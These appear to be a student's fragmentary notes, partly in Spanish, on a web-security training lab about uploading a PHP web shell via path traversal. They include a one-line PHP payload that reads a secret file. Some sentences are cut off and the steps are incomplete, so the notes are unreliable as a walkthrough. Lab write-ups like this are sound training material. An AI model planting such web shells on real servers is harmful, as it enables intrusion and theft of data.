03 Lab: Web shell upload via path traversal
Last updated
Last updated
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a .
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file
/home/carlos/secret
. Submit this secret using the button provided in the lab banner.You can log in to your own account using the following credentials:
wiener:peter
Exploramos el inicio de sesión y nos permite subir imagen
https://0a9f00a50375fb3782ee154f00be0000.web-security-academy.net/files/avatars/04.png
<?php echo file_get_contents('/home/carlos/secret'); ?>
The server is configured to prevent execution of user-supplied files
Esto era el secrets:
Observamos el Admin=False